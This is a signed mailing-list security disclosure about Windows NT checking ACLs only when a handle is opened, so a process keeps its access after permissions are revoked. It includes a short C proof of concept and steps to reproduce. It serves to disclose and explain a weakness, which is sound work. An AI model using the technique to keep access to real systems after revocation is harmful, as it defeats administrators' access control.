Windows NT does not check permissions after HANDLEs are open

[c0ncept () hushmail com]

-----BEGIN PGP SIGNED MESSAGE-----


   Sorry for the cross-post; I thought this would be relevent to both communities.

   The component of the NT executive responsible for enforcing ACLs and DACLs is know as the Security Reference 
Monitor. When a kernel resource is requested, the requested program specifies the type of access it desires. The SRM 
checks against the access list, and grants the requestor a HANDLE to the object if requestor has appropriate rights.
    The check against the ACL only occurs when the HANDLE is first opened, however. If a HANDLE is opened and 
permissions on the objecect subsiquently change, the original requestor of the object retains the original 
access-permissions. Therefore, if is possible to retain access to an object after the Create/Owner or an administrator 
has changed the ACL simply by maintaining an open handle. If the requestor is a service or server-program that is 
expected to run 24/7 the object will remain accessible long after the ACL has been altered [thing ISAPI,extended stored 
procedures, et al].


  -- c0ncept

  O/T: I own a honda, and have been told by every mechanic that has looked at it that it is the easiest car to break 
into [ the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier.

proof of concept:
  1.) create a file named "test.txt". Make it writeable to the curretn user
  2.) compile and run the included C code
  3.) when the program prompts you to change the ACL, uncheck
      Allow Inheritable Permissions to Propagate and remove all
      entries from the ACE. Press <return> at the prompt.
  4.) Take ownership of the file and open it. Notice that although the
      ACL had already been modified, the write succeeded.

[-- cut code here --]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define FILE_NAME       "test.txt"
#define MESSAGE         "Test"
#define MSG_LEN         4

int main(int argc, char** argv)
{
        HANDLE fileHandle;
        DWORD written;

        fileHandle = CreateFile(FILE_NAME,GENERIC_WRITE,
                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL);
        if(fileHandle == INVALID_HANDLE_VALUE){
                perror("Invalid Handle Value.\n");
                exit(1);
        }
        printf("Change the file's ACLs and press enter.");
        getchar();
        WriteFile(fileHandle,MESSAGE,MSG_LEN,&written,NULL);
        CloseHandle(fileHandle);

        return 0;
}
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.0

wlwEARECABwFAjuNdeQVHGMwbmNlcHRAaHVzaG1haWwuY29tAAoJEPQWHaIUc7jETigA
n3E8BIlimuBni27rFfMuDV5FslDTAKCWoLPNCVWbYkFZOqoQB0JfHHfRWw==
=gsEn
-----END PGP SIGNATURE-----